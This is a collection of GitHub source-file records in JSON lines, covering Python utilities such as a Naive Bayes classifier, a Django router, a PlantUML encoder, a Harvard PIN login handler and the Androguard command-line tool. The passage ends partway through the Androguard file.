df.loc[~(df.educationPosition.isnull())]\n df_test = df.loc[(df.educationPosition.isnull())]\n data = df_train[[\"educationPosition\", \"requirement\"]].values\n\n X, Y = [' '.join(lcut(i[1])) for i in data], [i[0] for i in data]\n\n from sklearn.feature_extraction.text import CountVectorizer\n from sklearn.feature_extraction.text import TfidfTransformer\n\n # 将文本中的词语转换为词频矩阵\n vectorizer = CountVectorizer()\n\n # 计算个词语出现的次数\n vec = vectorizer.fit(X)\n X_data = vec.transform(X)\n\n # 获取词袋中所有文本关键词\n # word = vectorizer.get_feature_names()\n\n # print('【查看单词】')\n\n # for w in word:\n # print(w, end=\" \")\n # else:\n # print(\"\\n\")\n\n # 将词频矩阵X统计成TF-IDF值\n transformer = TfidfTransformer()\n\n tf = transformer.fit(X_data)\n tfidf = tf.transform(X_data)\n\n # 查看数据结构 tfidf[i][j]表示i类文本中的tf-idf权重\n weight = tfidf.toarray()\n # print(weight)\n\n # --------------------------------------数据分析------------------------------------\n from sklearn.naive_bayes import MultinomialNB\n from sklearn.metrics import classification_report\n from sklearn.model_selection import train_test_split\n\n X_train, X_test, y_train, y_test = train_test_split(weight, Y)\n # print(len(X_train), len(X_test))\n # print(len(y_train), len(y_test))\n # print(X_train)\n\n # 调用MultinomialNB分类器\n clf = MultinomialNB().fit(X_train, y_train)\n pre = clf.predict(X_test)\n # print(\"预测结果:\", pre)\n # print(\"真实结果:\", y_test)\n # print(classification_report(y_test, pre))\n\n # 对于测试数据\n\n df_test_use = df_test[[\"educationPosition\", \"requirement\"]]\n data_test = df_test_use.values\n X_test1 = [' '.join(lcut(i[1])) for i in data_test]\n X_test1 = vec.transform(X_test1)\n # tfidf1 = tf.transform(X_test1)\n\n # 查看数据结构 tfidf[i][j]表示i类文本中的tf-idf权重\n # weight1 = tfidf1.toarray()\n # print(weight1)\n\n pre1 = clf.predict(X_test1)\n # print(\"预测结果:\", pre1)\n\n df_test['educationPosition'] = pre1\n\n # df_pre = df.loc[df.education.isnull()]\n # # df.loc[df.education.isnull()]['predict'] = pre1\n\n # df_pre['education'] = pre1\n # df_test.to_csv(\"bb3.csv\")\n\n df_position = pd.concat([df_train, df_test])\n\n return (df_position)\n","repo_name":"hxb087/people_position","sub_path":"model/MultinomialNBModel.py","file_name":"MultinomialNBModel.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74438671411","text":"from pygmi import Button, events, wmii\n\nclass Mail(object):\n\n def __init__(self, name='mail', colors=None, warn_colors=None,\n warn_level=5):\n if not colors: colors = wmii.cache['normcolors']\n if not warn_colors: warn_colors = wmii.cache['urgentcolors']\n self.colors = colors\n self.warn_colors = warn_colors\n self.warn_level = warn_level\n self.button = Button('right', name, colors)\n events.bind({'Mail': lambda args: self._mail(args)})\n self._mail('init 0')\n\n def _mail(self, mail):\n count = int(mail.split()[1])\n if count < self.warn_level:\n self.button.colors = self.colors\n else:\n self.button.colors = self.warn_colors\n self.button.label = 'Mail: %d' % count\n","repo_name":"epontan/python-wmiirc-plugins","sub_path":"mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10967652344","text":"from app import views\nfrom django.urls import path,include\nfrom rest_framework import routers\nrouter = routers.SimpleRouter()\nrouter.register('allstudents',views.allstudents)\nrouter.register('allusers',views.allusers)\n\nurlpatterns = [\n path('',views.home,name=\"home\"),\n path('',include(router.urls)),\n]\n","repo_name":"sudhinsuresh/DjangoApiusingViewset","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28606767734","text":"from prettytable import PrettyTable\r\n\r\nquanti = {'M': 2, 'Q': 4, 'D': 10, 'P': 100}\r\n\r\ndef user_input():\r\n input_data = []\r\n data_start = []\r\n data_end = []\r\n frequency = []\r\n first_start, first_end = input('First Data = ').split('-')\r\n first_I = (int(first_end) - int(first_start)) + 1\r\n last_start, last_end = input('Last Data = ').split('-')\r\n last_I = (int(last_end) - int(last_start)) + 1\r\n if first_I == last_I:\r\n I = first_I\r\n total_data = int(((int(last_start) - int(first_start)) / I) + 1)\r\n data_start.append(int(first_start))\r\n data_end.append(int(first_end))\r\n for x in range(1, total_data):\r\n start = int(data_end[x - 1] + 1)\r\n end = int(start + (I - 1))\r\n data_start.append(start)\r\n data_end.append(end)\r\n for x in range(0, total_data):\r\n create_data = str(data_start[x]) + '-' + str(data_end[x])\r\n input_data.append(create_data)\r\n for data in input_data:\r\n f = input('Frequency of ' + str(data) + ' : ')\r\n frequency.append(float(f))\r\n print()\r\n cf = []\r\n make_cf = 0\r\n for i in frequency:\r\n make_cf += i\r\n cf.append(int(make_cf))\r\n show_data = PrettyTable([' Classes ', ' f ', ' cf '])\r\n for z in range(len(input_data)):\r\n show_data.add_row([input_data[z],frequency[z],cf[z]])\r\n print(show_data)\r\n return input_data, frequency, data_start, data_end, I,cf\r\n\r\n\r\ndef find_ans(data,frequency,data_start,find_alpa,find_num,I,cf):\r\n N = cf[len(cf) - 1]\r\n column = quanti[find_alpa]\r\n classs = find_num * N / column\r\n loca = 0\r\n for i in range(0, len(cf)):\r\n if cf[i] > classs:\r\n loca = i\r\n break\r\n L = data_start[loca] - 0.5\r\n cfL = cf[loca - 1]\r\n fD = int(frequency[loca])\r\n ans = L + (I * ((classs - cfL) / fD))\r\n # print('cf >>>', cf)\r\n print('N >>>', int(N))\r\n print('4/10/100 >>>', column)\r\n print(find_alpa + str(find_num) + ' class >>> ' + str(classs) + '__')\r\n print(' - - -')\r\n print(f'location >>> line {loca + 1} ({data[loca]})')\r\n print('L >>>', L)\r\n print('I >>>', I)\r\n print('rN/*** >>>', classs)\r\n print('cfL >>>', cfL)\r\n print('f(Q/D/R) >>>', fD)\r\n print(find_alpa + str(find_num) + ' >>> ' + str(ans))\r\n\r\ndata_C, frequency_C, data_start_C, data_end_C, I_C, cf = user_input()\r\nwhile True:\r\n print()\r\n find = input('find : ').upper()\r\n if find == '-':\r\n break\r\n else:\r\n alpa = find[0]\r\n num = int(find[1:len(find)])\r\n find_ans(data_C , frequency_C, data_start_C, alpa ,num ,I_C,cf)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"bpantan202/Statistic-Calculator","sub_path":"5_Quartile Deciles Percentiles (Group).py","file_name":"5_Quartile Deciles Percentiles (Group).py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6475806783","text":"\"\"\"\nImplement PlantUML Text Encoding, described in http://plantuml.com/pte.\n\nA text description has to be:\n- Encoded in UTF-8\n- Compressed using Deflate algorithm\n- Reencoded in ASCII using a transformation \"close to base64\"\n\"\"\"\nimport zlib\n\nfrom six.moves import zip_longest\nfrom six import string_types\n\nSIXBITOFFSET = [48] * 10 + [55] * 26 + [61] * 26 + [-17] + [32]\n\n\ndef encode(text):\n \"Apply PlantUML text encoding to a diagram description\"\n assert isinstance(text, string_types)\n utf8_encoded_data = text.encode('utf-8')\n compressed_data = bytearray(zlib.compress(utf8_encoded_data)[2:-4])\n return _encode_similar_to_base64(compressed_data)\n\n\ndef _encode_similar_to_base64(byte_seq):\n \"Encode a byte sequence 3 bytes at a time, padding with zeros\"\n assert isinstance(byte_seq, bytearray)\n return ''.join(\n _encode_3_bytes(c1, c2, c3) for c1, c2, c3 in _grouper(byte_seq, 3, 0))\n\n\ndef _grouper(iterable, n, fillvalue=None):\n \"Collect data into fixed-length chunks or blocks\"\n assert isinstance(iterable, bytearray)\n args = [iter(iterable)] * n\n return zip_longest(*args, fillvalue=fillvalue)\n\n\ndef _encode_3_bytes(byte1, byte2, byte3):\n \"Take 3 8-bits groups and encode them as 4 6-bits groups\"\n assert isinstance(byte1, int)\n assert isinstance(byte2, int)\n assert isinstance(byte3, int)\n sixbits1 = byte1 >> 2\n sixbits2 = ((byte1 & 0x3) << 4) | (byte2 >> 4)\n sixbits3 = ((byte2 & 0xF) << 2) | (byte3 >> 6)\n sixbits4 = byte3 & 0x3F\n return ''.join([\n _encode_6_bits(sixbits1 & 0x3F), _encode_6_bits(sixbits2 & 0x3F),\n _encode_6_bits(sixbits3 & 0x3F), _encode_6_bits(sixbits4 & 0x3F)\n ])\n\n\ndef _encode_6_bits(six_bits):\n \"Encode a group of 6 bits into a charcter valid in a URL\"\n assert isinstance(six_bits, int)\n return chr(SIXBITOFFSET[six_bits] + six_bits)\n","repo_name":"qdamian/htmlvis","sub_path":"htmlvis/plantuml_text_encoding.py","file_name":"plantuml_text_encoding.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38125351654","text":"s = input()\nk = int(input())\nres = {}\nfor i in range(1,len(s),2):\n tmp = int(f'{s[i-1]}{s[i]}')\n res[tmp] = res[tmp] +1 if tmp in res else 1\n\nres = sorted(res.items())\nok = True\nfor key, val in res:\n if val >= k:\n print(key, val)\n ok = False\n\nif ok: print(\"NOT FOUND\")","repo_name":"Sudo248/Python-PTIT","sub_path":"nguong_toi_thieu.py","file_name":"nguong_toi_thieu.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23506823549","text":"import sys\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\nmatrix = [[1e9] * (N+1) for _ in range(N+1)]\nfor _ in range(M):\n x, y = map(int, input().split())\n matrix[x][y] = 1\n matrix[y][x] = 1\n\nfor k in range(1, N+1):\n for i in range(1, N+1):\n for j in range(1, N+1):\n if matrix[i][j] > matrix[i][k] + matrix[k][j]:\n matrix[i][j] = matrix[i][k] + matrix[k][j]\n\nmini = 1e9\nanswer = 0\nfor i in range(1, N+1):\n x = sum(matrix[i][1:])\n if x < mini:\n answer = i\n mini = x\n\nprint(answer)","repo_name":"nkrang/Algorithm-Study","sub_path":"202202/B-1389/케빈_베이컨의_6단계_법칙.py","file_name":"케빈_베이컨의_6단계_법칙.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16570467733","text":"import numpy as np\nimport csv\nimport matplotlib.pyplot as plt\nimport copy\n\n\ndef string_soma_to_array(str_soma):\n\n\tsoma_array = str_soma[1:-1].split()\n\tsoma_array[0] = int(soma_array[0])\n\tsoma_array[1] = int(soma_array[1])\n\tsoma_array[2] = int(soma_array[2])\n\tsoma_array[3] = soma_array[3][1:-1]\n\tsoma_array[4] = int(soma_array[4])\n\tsoma_array[5] = int(soma_array[5])\n\tsoma_array[6] = int(soma_array[6])\n\n\treturn np.array(soma_array,dtype=object)\n\n\n\nsoma_path = '/data/elowsky/OLST/reconstruction/180926/updated_somas_after_cnn_2.npy'\nsomas = np.load(soma_path ,allow_pickle=True)\n\n# read csv\ncsv_path = '/data/elowsky/OLST/reconstruction/triage/triage_duplicates_truth_180926.csv'\n\nduplicate_array = np.empty(shape=(len(somas),8),dtype=object)\n\nwith open(csv_path) as csvfile:\n\treadCSV = csv.reader(csvfile, delimiter=',')\n\tfor i,row in enumerate(readCSV):\n\n\t\tdist = int(row[0])\n\t\t(dist_x, dist_y, dist_z) = (int(row[1]),int(row[2]),int(row[3]))\n\t\tsoma_1 = row[4]\n\t\tsoma_2 = row[5]\n\t\tdirection = row[6]\n\t\tduplicate = int(row[7])\n\n\t\tduplicate_array[i,:] = np.array([dist,dist_x,dist_y,dist_z,soma_1,soma_2,direction,duplicate],dtype=object)\n\nduplicate_array_copy = copy.deepcopy(duplicate_array)\n\nduplicates = []\n\npredictions = [0]*len(duplicate_array)\ntruth = list(duplicate_array[:,-1])\n\nwhile len(duplicate_array) > 0:\n\n\tsoma_pair = duplicate_array[0]\t\n\n\tdup_tuple_soma_array = ()\n\tdup_tuple_duplicate_array = ()\t\n\tdirection_tuple = ()\n\n\tdist = soma_pair[0]\n\tdist_x = soma_pair[1]\n\tdist_y = soma_pair[2]\n\tdist_z = soma_pair[3]\n\t\n\tsoma_1 = soma_pair[4]\n\tsoma_1_array = string_soma_to_array(soma_1)\n\tsoma_1_index_in_somas = np.where(np.all(somas == soma_1_array,axis=1))[0][0]\n\tsoma_1_index_in_duplicates = np.where(duplicate_array[:,4] == soma_1)[0][0]\n\n\tsoma_2 = soma_pair[5]\n\tsoma_2_array = string_soma_to_array(soma_2)\n\t\t\n\t# if soma_2 is no longer in duplicate array\n\tif not np.any(duplicate_array[:,4] == soma_2):\n\t\tduplicate_array = np.delete(duplicate_array,soma_1_index_in_duplicates,0)\n\t\tcontinue\n\n\tsoma_2_index_in_somas = np.where(np.all(somas == soma_2_array,axis=1))[0][0]\n\tsoma_2_index_in_duplicates = np.where(duplicate_array[:,4] == soma_2)[0][0]\n\n\tdirection = soma_pair[6]\n\n\tif dist <= 100:\t\n\t\tif duplicate_array[soma_2_index_in_duplicates,5] == soma_1:\n\n\t\t\t\t# prediction list update\n\t\t\t\tpredictions[np.where(soma_1 == duplicate_array_copy[:,4])[0][0]] = 1\n\t\t\t\tpredictions[np.where(soma_2 == duplicate_array_copy[:,4])[0][0]] = 1\n\n\t\t\t\t# add to duplicate tuple\n\t\t\t\tdup_tuple_soma_array = dup_tuple_soma_array + (soma_1_index_in_somas,soma_2_index_in_somas)\n\t\t\t\tdup_tuple_duplicate_array = dup_tuple_duplicate_array + (soma_1_index_in_duplicates,soma_2_index_in_duplicates)\n\t\t\t\tdirection_tuple = direction_tuple + (direction,)\n\n\t\t\t\t# find all other somas that are partners with 1 and 2\n\t\t\t\tindices_of_partners_with_1 = list(np.where(duplicate_array[:,5] == soma_1)[0])\n\t\t\t\tindices_of_partners_with_2 = list(np.where(duplicate_array[:,5] == soma_2)[0])\n\n\t\t\t\t# remove partner indices\n\t\t\t\tindices_of_partners_with_1.remove(soma_2_index_in_duplicates)\n\t\t\t\tindices_of_partners_with_2.remove(soma_1_index_in_duplicates)\n\t\t\n\t\t\t\tfor ind in indices_of_partners_with_1:\n\t\t\t\t\tsoma_pair = duplicate_array[ind,:]\n\t\t\t\t\tdist = soma_pair[0]\n\t\t\t\t\tsoma = soma_pair[4]\n\t\n\t\t\t\t\tdirection = soma_pair[6]\n\t\t\t\t\tsoma_array = string_soma_to_array(soma)\n\t\t\t\t\tsoma_index_in_somas = np.where(np.all(somas == soma_array,axis=1))[0][0]\n\t\t\t\t\tif dist < 100:\n\t\t\t\t\t\tif direction not in direction_tuple or ('zy' in direction_tuple and direction_tuple.count(direction)<2) :\n\t\t\t\t\t\t\tdup_tuple_soma_array = dup_tuple_soma_array + (soma_index_in_somas,)\n\t\t\t\t\t\t\tdup_tuple_duplicate_array = dup_tuple_duplicate_array + (ind,)\n\t\t\t\t\t\t\tdirection_tuple = direction_tuple + (direction,)\n\t\t\t\t\t\t\t# prediction list update\n\t\t\t\t\t\t\tpredictions[np.where(soma == duplicate_array_copy[:,4])[0][0]] = 1\n\n\n\n\n\t\t\t\tfor ind in indices_of_partners_with_2:\n\t\t\t\t\tsoma_pair = duplicate_array[ind,:]\n\t\t\t\t\tdist = soma_pair[0]\n\t\t\t\t\tsoma = soma_pair[4]\n\n\t\t\t\t\tdirection = soma_pair[6]\n\t\t\t\t\tsoma_array = string_soma_to_array(soma)\n\t\t\t\t\tsoma_index_in_somas = np.where(np.all(somas == soma_array,axis=1))[0][0]\n\t\t\t\t\tif dist < 100:\n\t\t\t\t\t\tif direction not in direction_tuple or ('zy' in direction_tuple and direction_tuple.count(direction)<2) :\n\t\t\t\t\t\t\tdup_tuple_soma_array = dup_tuple_soma_array + (soma_index_in_somas,)\n\t\t\t\t\t\t\tdup_tuple_duplicate_array = dup_tuple_duplicate_array + (ind,)\n\t\t\t\t\t\t\tdirection_tuple = direction_tuple + (direction,)\n\t\t\t\t\t\t\t# prediction list update\n\t\t\t\t\t\t\tpredictions[np.where(soma == duplicate_array_copy[:,4])[0][0]] = 1\n\n\n\t\t\t\t# remove somas that are grouped from duplicates array\n\t\t\t\tduplicate_array = np.delete(duplicate_array,dup_tuple_duplicate_array,0)\n\n\t\t\t\t# add to final duplcate list\n\t\t\t\tduplicates.append(dup_tuple_soma_array)\n\t\telse:\n\n\t\t\tprint('not partners')\n\n\telse:\n\t\t# Distance is > 100, delete\n\t\tduplicate_array = np.delete(duplicate_array,[soma_1_index_in_duplicates,soma_2_index_in_duplicates],0)\n\nsoma_count = 0\nsize_2 = 0\nsize_3 = 0\nsize_4 = 0\n\nfor dup in duplicates:\n\tif len(dup) == 2:\n\t\tsize_2 += 1\n\tif len(dup) == 3:\n\t\tsize_3 += 1\n\tif len(dup) == 4:\n\t\tsize_4 += 1\n\tsoma_count += len(dup)\n\nprint()\nprint('# Somas:',len(somas))\nprint()\nprint('# Total Duplicate Groups:', len(duplicates))\nprint('# Total Somas in Groups:', soma_count)\nprint('# 2-Groups:', size_2)\nprint('# 3-Groups:', size_3)\nprint('# 4-Groups:', size_4)\nprint()\n\n\n\ntp = sum([1 for x in zip(predictions,truth) if x[0] == 1 and x[1]==1])\ntn = sum([1 for x in zip(predictions,truth) if x[0] == 0 and x[1]==0])\nfp = sum([1 for x in zip(predictions,truth) if x[0] == 1 and x[1]==0])\nfn = sum([1 for x in zip(predictions,truth) if x[0] == 0 and x[1]==1])\nacc = round(sum([1 for x in zip(predictions,truth) if x[0] == x[1]])/len(truth)*100,1)\n\nprint('Accuracy:',acc,'%')\nprint('# tp:',tp)\nprint('# tn:',tn)\nprint('# fp:',fp)\nprint('# fn:',fn)\n\n#for i,x in enumerate(zip(predictions,truth)):\n#\tif x[0] == 0 and x[1] == 1:\n#\t\tprint(i+1)\n\t\n\n\n\n\n\n\n\t\t\n\n\n\t\t\n\n\n\n\t\t\n\n","repo_name":"coreyelowsky/OLST","sub_path":"soma_detection/triage_duplicates_truth_analysis.py","file_name":"triage_duplicates_truth_analysis.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27817567375","text":"import os\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_mail import Mail\nfrom flask_images import Images\nimport logging\nimport logging.config\nimport sys\n\n\ndotenv_path = os.path.join(os.getcwd(), '.env')\nif os.path.isfile(dotenv_path):\n from dotenv import load_dotenv\n load_dotenv(dotenv_path)\n\n\napp = Flask(__name__)\napp.config.from_object('lifebartenders.config')\n\ndb = SQLAlchemy(app)\n\nmail = Mail(app)\n\nimages = Images(app)\n\nhandler = logging.StreamHandler(sys.stdout)\nif not app.debug:\n handler = logging.handlers.RotatingFileHandler(\n 'app.log', maxBytes=102400, backupCount=3\n )\n\nformater = logging.Formatter(\n '{\"timestamp\": \"%(asctime)s\", '\n '\"level\": \"%(levelname)s\", '\n '\"module\": \"%(module)s\", '\n '\"function\": \"%(funcName)s\", '\n '\"file\": \"%(filename)s\", '\n '\"line\": \"%(lineno)d\", '\n '\"message\": \"%(message)s\"}',\n \"%Y-%m-%d %H:%M:%S\"\n)\n\nhandler.setFormatter(formater)\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\nlog.addHandler(handler)\n","repo_name":"leandrocorreasantos/lifebartenders","sub_path":"lifebartenders/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25053269751","text":"from django.contrib.auth import authenticate, login\nfrom hu_authzproxy.hu_authz_pin_backend import HarvardAuthZProxyBackend\nfrom hu_authzproxy.authz_proxy_validation_info import AuthZProxyValidationInfo\nimport sys\n\n \n \nclass AuthZProxyLoginHandler:\n \"\"\"Handles the attempt to authorize/login the user, may be used in a view\n \n ----------------------------\n sample usage in a view:\n ----------------------------\n pin_login_handler = AuthZProxyLoginHandler(request, validation_settings) # request object\n\n validation_settings = { 'app_names' : [']}\n\n\n if pin_login_handler.did_login_succeed():\n #the_user = pin_login_handler.user # if needed\n return HttpResponseRedirect('go to login success page')\n else:\n err_dict = pin_login_handler.get_error_dict() # get error lookup for use in template\n return render_to_response('template_dir/login_failed.html', err_dict, context_instance=RequestContext(request))\n\n (i) Sample file: see hu_authzpoxy/views.py\n \n ----------------------------\n sample usage in a template, if error occurred\n ---------------------------- \n {% if pin_auth_has_err %}\n Sorry! Login failed.\n {% if pin_auth_err_no_email_in_hu_ldap %}You do not have an email specified in the Harvard directory.{% endif %}\n {% if pin_auth_err_huid_not_found_in_hu_ldap %}Your information was not found in the Harvard directory.{% endif %}\n {% if pin_auth_err_account_not_active %}Your account is not active. Please contact the administrator.{% endif %}\n

Return to the log in page.

\n {% endif %}\n \n (i) Sample file: see templates/view_pin_login_failed.html\n \n \n ---------------------------- \n # How Django handles authentication after pin is verfied. \n # 'access_settings' are specific to how Django handles its User objects\n # (Again, these permissions are checked AFTER a successful HU Pin login)\n #\n # example of using 'access_settings' in the init \n ---------------------------- \n # restrict to active, staff users in Django\n access_settings = { 'restrict_to_existing_users':True \\\n , 'restrict_to_active_users':True \\\n , 'restrict_to_staff':False \\\n , 'restrict_to_superusers':False}\n \n pin_login_handler = AuthZProxyLoginHandler(request, app_names, user_request_ip, gnupghome, **access_settings)\n \n \n \"\"\"\n def __init__(self, authz_validation_info, **access_settings):\n \"\"\"\n authz_validation_info is an AuthZProxyValidationInfo object\n \"\"\"\n self.user = None\n self.authz_validation_info = authz_validation_info\n self.has_err = False\n self.err_lookup = {}\n self.err_msgs = []\n \n self.access_settings = access_settings\n \n self.handle_authorization()\n \n def did_login_succeed(self):\n if self.user is not None and not self.has_err:\n return True\n return False\n \n def get_error_dict(self):\n return self.err_lookup \n\n def get_err_msgs(self):\n return self.err_msgs\n \n def get_user(self):\n return self.user\n \n def handle_authorization(self):\n self.user = None\n \n if self.access_settings is not None:\n authorization_backend = HarvardAuthZProxyBackend( authz_validation_info=self.authz_validation_info, **self.access_settings) \n else:\n authorization_backend = HarvardAuthZProxyBackend(self.authz_validation_info)\n \n self.user = authorization_backend.authenticate()\n if self.user:\n self.has_err= False\n else:\n self.has_err = True\n self.err_lookup = authorization_backend.get_err_flag_dict()\n self.err_msgs = authorization_backend.get_err_msgs()\n \n \n \n","repo_name":"raprasad/Django-HU-Pin-Auth","sub_path":"hu_authzproxy/authzproxy_login_handler.py","file_name":"authzproxy_login_handler.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28194191766","text":"\nimport logging\n#设置配置信息\nlogging.basicConfig(level=logging.INFO,format='%(asctime)s-%(name)s-%(levelname)s-%(message)s')\n#定义日志名称\nlogger=logging.getLogger(\"loging_demo\")\n#info.debug\nlogger.info(\"info\")\nlogger.debug(\"debug\")\nlogger.warning(\"warning\")\n","repo_name":"Dragon0129-jia/APItest","sub_path":"logs/loging_demo.py","file_name":"loging_demo.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13237966437","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Androguard is a full Python tool to play with Android files.\"\"\"\n\nfrom __future__ import print_function\n\n# core modules\nimport sys\nimport logging\n\n# 3rd party modules\nimport click\n\n# local modules\nimport androguard\nfrom androguard.core.androconf import show_logging\nfrom androguard.cli import (androarsc_main,\n androaxml_main,\n androcg_main,\n export_apps_to_format,\n androsign_main,\n androlyze_main,\n androgui_main,\n androdis_main\n )\n\n\n@click.group(help=__doc__)\n@click.version_option(version=androguard.__version__)\n@click.option(\"--verbose\", \"--debug\", 'verbosity', flag_value='verbose', help=\"Print more\")\n@click.option(\"--quiet\", 'verbosity', flag_value='quiet', help=\"Print less (only warnings and above)\")\n@click.option(\"--silent\", 'verbosity', flag_value='silent', help=\"Print no log messages\")\ndef entry_point(verbosity):\n level = logging.INFO\n\n if verbosity == 'verbose':\n level = logging.DEBUG\n if verbosity == 'quiet':\n level = logging.WARNING\n\n # If something out of this module is imported, activate console logging\n if verbosity != 'silent':\n show_logging(level=level)\n\n\n@entry_point.command()\n@click.option(\n '--input', '-i', 'input_',\n type=click.Path(exists=True),\n help='AndroidManifest.xml or APK to parse (legacy option)',\n)\n@click.option(\n '--output', '-o',\n help='filename to save the decoded AndroidManifest.xml to, default stdout',\n)\n@click.option(\"--resource\", \"-r\",\n help=\"Resource inside the APK to parse instead of AndroidManifest.xml\"\n)\n@click.argument(\n 'file_',\n type=click.Path(exists=True),\n # help='AndroidManifest.xml or APK to parse',\n required=False,\n)\ndef axml(input_, output, file_, resource):\n \"\"\"\n Parse the AndroidManifest.xml.\n\n Parsing is either direct or from a given APK and prints in XML format or\n saves to file.\n\n This tool can also be used to process any AXML encoded file, for example\n from the layout directory.\n\n Example:\n\n \\b\n $ androguard axml AndroidManifest.xml\n \"\"\"\n if file_ is not None and input_ is not None:\n print(\"Can not give --input and positional argument! \"\n \"Please use only one of them!\")\n sys.exit(1)\n\n if file_ is None and input_ is None:\n print(\"Give one file to decode!\")\n sys.exit(1)\n\n if file_ is not None:\n androaxml_main(file_, output, resource)\n elif input_ is not None:\n androaxml_main(input_, output, resource)\n\n\n@entry_point.command()\n@click.option(\n '--input', '-i', 'input_',\n type=click.Path(exists=True),\n help='resources.arsc or APK to parse (legacy option)',\n)\n@click.argument(\n 'file_',\n # help='resources.arsc or APK to parse',\n required=False,\n)\n@click.option(\n '--output', '-o',\n # required=True, # not required due to --list-types\n help='filename to save the decoded resources to',\n)\n@click.option(\n '--package', '-p',\n help='Show only resources for the given package name '\n '(default: the first package name found)',\n)\n@click.option(\n '--locale', '-l',\n help='Show only resources for the given locale (default: \\'\\\\x00\\\\x00\\')',\n)\n@click.option(\n '--type', '-t', 'type_',\n help='Show only resources of the given type (default: public)',\n)\n@click.option(\n '--id', 'id_',\n help=\"Resolve the given ID for the given locale and package. Provide the hex ID!\"\n)\n@click.option(\n '--list-packages', '-t', is_flag=True,\n default=False,\n help='List all package names and exit',\n)\n@click.option(\n '--list-locales', '-t', is_flag=True,\n default=False,\n help='List all package names and exit',\n)\n@click.option(\n '--list-types', '-t', is_flag=True,\n default=False,\n help='List all types and exit',\n)\ndef arsc(input_,\n file_,\n output,\n package,\n locale,\n type_,\n id_,\n list_packages,\n list_locales,\n list_types):\n \"\"\"\n Decode resources.arsc either directly from a given file or from an APK.\n\n Example:\n\n \\b\n $ androguard arsc app.apk\n \"\"\"\n from androguard.core import androconf\n from androguard.core.bytecodes import apk\n\n if file_ and input_:\n print(\"Can not give --input and positional argument! \"\n \"Please use only one of them!\",\n file=sys.stderr)\n sys.exit(1)\n\n if not input_ and not file_:\n print(\"Give one file to decode!\", file=sys.stderr)\n sys.exit(1)\n\n if input_:\n fname = input_\n else:\n fname = file_\n\n ret_type = androconf.is_android(fname)\n if ret_type == \"APK\":\n a = apk.APK(fname)\n arscobj = a.get_android_resources()\n if not arscobj:\n print(\"The APK does not contain a resources file!\", file=sys.stderr)\n sys.exit(0)\n elif ret_type == \"ARSC\":\n with open(fname, 'rb') as fp:\n arscobj = apk.ARSCParser(fp.read())\n if not arscobj:\n print(\"The resources file seems to be invalid!\", file=sys.stderr)\n sys.exit(1)\n else:\n print(\"Unknown file type!\", file=sys.stderr)\n sys.exit(1)\n\n if id_:\n # Strip the @, if any\n if id_[0] == \"@\":\n id_ = id_[1:]\n try:\n i_id = int(id_, 16)\n except ValueError:\n print(\"ID '{}' could not be parsed! have you supplied the correct hex ID?\".format(id_))\n sys.exit(1)\n\n name = arscobj.get_resource_xml_name(i_id)\n if not name:\n print(\"Specified resource was not found!\")\n sys.exit(1)\n\n print(\"@{:08x} resolves to '{}'\".format(i_id, name))\n print()\n\n # All the information is in the config.\n # we simply need to get the actual value of the entry\n for config, entry in arscobj.get_resolved_res_configs(i_id):\n print(\"{} = '{}'\".format(config.get_qualifier() if not config.is_default() else \"\", entry))\n\n sys.exit(0)\n\n if list_packages:\n print(\"\\n\".join(arscobj.get_packages_names()))\n sys.exit(0)\n\n if list_locales:\n for p in arscobj.get_packages_names():\n print(\"In Package:\", p)\n print(\"\\n\".join(map(lambda x: \" \\\\x00\\\\x00\"\n if x == \"\\x00\\x00\"\n else \" {}\".format(x),\n sorted(arscobj.get_locales(p)))))\n sys.exit(0)\n\n if list_types:\n for p in arscobj.get_packages_names():\n print(\"In Package:\", p)\n for locale in sorted(arscobj.get_locales(p)):\n print(\" In Locale: {}\".format(\"\\\\x00\\\\x00\"\n if locale == \"\\x00\\x00\" else locale))\n print(\"\\n\".join(map(\" {}\".format,\n sorted(arscobj.get_types(p, locale)))))\n sys.exit(0)\n\n androarsc_main(arscobj,\n outp=output,\n package=package,\n typ=type_,\n locale=locale)\n\n\n@entry_point.command()\n@click.option(\n '--output', '-o',\n default=\"callgraph.gml\", show_default=True,\n help='Filename of the output file, the extension is used to decide which '\n 'format to use (default callgraph.gml)',\n)\n@click.option(\n '--show', '-s',\n default=False,\n help='instead of saving the graph, print it with mathplotlib '\n '(you might not see anything!)',\n)\n@click.option(\n '--verbose', '-v', is_flag=True,\n default=False,\n help='Print more output',\n)\n@click.option(\n '--classname',\n default='.*', show_default=True,\n help='Regex to filter by classname',\n)\n@click.option(\n '--methodname',\n default='.*', show_default=True,\n help='Regex to filter by methodname',\n)\n@click.option(\n '--descriptor',\n default='.*', show_default=True,\n help='Regex to filter by 